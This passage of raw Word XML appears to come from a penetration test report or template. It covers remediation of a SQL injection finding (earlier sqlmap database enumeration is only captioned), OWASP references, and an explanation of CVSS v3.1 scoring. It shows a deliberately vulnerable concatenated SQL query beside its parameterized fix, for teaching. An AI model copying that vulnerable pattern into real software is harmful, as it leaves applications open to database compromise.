                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t xml:space="preserve"> output showing enumerated databases</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:spacing w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Note: All testing was performed within the authorized scope window (09:00–17:00 on 2025-04-08) using a dedicated test account on the staging environment. No production customer data was accessed or </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>extracted.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458B">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Implement the following fixes in order of priority:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Primary Fix: Replace all dynamic SQL query construction with parameterized queries (prepared statements). Example using Python with psycopg2:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458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60" w:type="dxa"/>
              <w:left w:w="280" w:type="dxa"/>
              <w:bottom w:w="160" w:type="dxa"/>
              <w:right w:w="280" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t># VULNERABLE (do not use):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>query = "SELECT * FROM users WHERE username = '" + username + "'"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cursor.execute</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(query)</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SECURE (use parameterized query):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>query = "SELECT * FROM users WHERE username = %s"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cursor.execute</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(query, (username,))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t># The database driver handles escaping — SQL i</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>njection is not possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458B">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Secondary Fix: Implement input validation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> reject usernames containing SQL special characters (\'\"--;)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve">Additional </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Defence</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>: Deploy a Web Application Firewall (WAF) with SQL injection rule sets as a compensating control</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Audit all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> other database query locations in the codebase for the same pattern using a static analysis tool (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Semgrep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>SonarQube</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458B">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>OWASP SQL Injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> https://owasp.org/www-community/attacks/SQL_Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>CWE-89: Improper Neutralization of Special Elements used in an SQL Command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>OWASP Testing Guide</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> Testing for SQL Injection (WSTG-INPV-05)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRPr="004610F1" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP SQL Injection Prevention Cheat Sheet </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="002F5BA3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="004610F1" w:rsidRDefault="004610F1" w:rsidP="004610F1">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004610F1" w:rsidRDefault="004610F1" w:rsidP="004610F1">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458B">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Vulnerability Scoring: CVSS v3.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>The Common Vulnerability Scoring System (CVSS) is the industry-standard framework for assessing and communicating the severity of security vulnerabilities. CVSS v3.1 produces a score between 0.0 and 10.0 ba</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>sed on a set of measurable characteristics. Using CVSS ensures consistency and objectivity in severity ratings across different assessors and organizations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458B">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>CVSS Base Score Metrics</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>The Base Score reflects the intrinsic characteristics of a vulnerability t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>hat are constant over time and across environments. It is composed of two groups:</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Options &amp; Meaning</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Attack Vector (AV)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 xml:space="preserve">Network (N) — exploitable remotely over the internet. Highest impact. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>Adjacent (A) — requires access to the same network segment. Local (L) — requires local system access. Physical (P) — requires physical access to the device.</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Attack Complexity (AC)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 xml:space="preserve">Low (L) — no special conditions required. Attacker can exploit reliably. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>High (H) — exploit requires specific conditions, race conditions, or additional preparation.</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Privileges Required (PR)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None (N) — no authentication required. Low (L) — requires basic authenticated access. High (H) — requires administrative privileges.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User Interaction (UI)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None (N) — no victim action required. Attacker exploits independently. Required (R) — victim must take an action (click a link, open a file).</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Scope (S)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 xml:space="preserve">Unchanged (U) — exploit impact is limited to the vulnerable component. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>Changed (C) — exploit impacts other components beyond the vulnerable one. Increases severity significantly.</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Confidentiality (C)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None (N) / Low (L) / High (H) — impact on data confidentiality if exploited.</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Integrity (I)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None (N) / Low (L) / High (H) — impact on data integrity if exploited.</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Availability (A)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None (N) / Low (L) / High (H) — impact on service availability if exploited.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458B">
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>CVSS Severity Ratings</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B458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Score Range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Severity &amp; Response Guidance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB458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9.0 – 10.0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CRITICAL — Requires immediate remediation. Remotely exploitable with no authentication, high impact across all dimensions. Escalate to leadership immediately.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB458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7.0 – 8.9</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HIGH — Remediate within 1–2 weeks. Significant risk with limited mitigating factors. Prioritize above normal patch cycle.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB458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lastRenderedPageBreak/>
              <w:t>4.0 – 6.9</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MEDIUM — Remediate within 30 days. Risk is real but mitigated by factors like authentication requirements or low impact sco</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>pe.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB458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0.1 – 3.9</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LOW — Remediate within 60–90 days. Limited exploitability or impact. Address in normal security maintenance cycles.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB458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INFORMATIONAL — No direct risk but worth noting. Configuration observations, best practice suggestions, or non-exploitable findings.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458B">
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>CVSS Vector String Examples</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>The vector string encodes all metric values into a compact format that allows anyone to recal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>culate and verify the score:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB45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60" w:type="dxa"/>
              <w:left w:w="280" w:type="dxa"/>
              <w:bottom w:w="160" w:type="dxa"/>
              <w:right w:w="280" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"># Critical: Remote SQL Injection — no </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>auth</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>, full impact</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS:3.1/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>AV:N</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Score: 9.8 — CRITICAL</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Meaning: Network accessible, Low complexity, No privileges, No user interaction,</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">         Unchanged sco</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>pe, High Confidentiality/Integrity/Availability impact</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High: Authenticated Remote Code Execution</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS:3.1/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>AV:N</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Score: 8.8 — HIGH</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Meaning: Same as above but requires Low privilege (authenticated user)</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Medium: Stored XSS requiring user interaction</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS:3.1/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>AV:N</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Score: 5.4 — MEDIUM</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Meaning: Network, Low complexity, Low privilege, User interaction Required,</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">         Changed scope (affects other users), Low C/I impact, No A </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>impact</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Low: Information Disclosure — internal paths</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
